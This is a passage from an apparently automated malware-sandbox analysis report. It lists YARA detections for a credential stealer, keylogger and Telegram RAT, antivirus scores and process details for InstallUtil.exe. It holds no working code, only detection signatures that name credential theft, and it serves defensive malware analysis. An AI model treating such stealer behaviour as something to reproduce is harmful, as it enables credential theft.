                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 79%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:23:11:46
                                                                            Start date:10/03/2025
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                            Imagebase:0xd90000
                                                                            File size:42'064 bytes
                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Disassembly

                                                                            Reset < >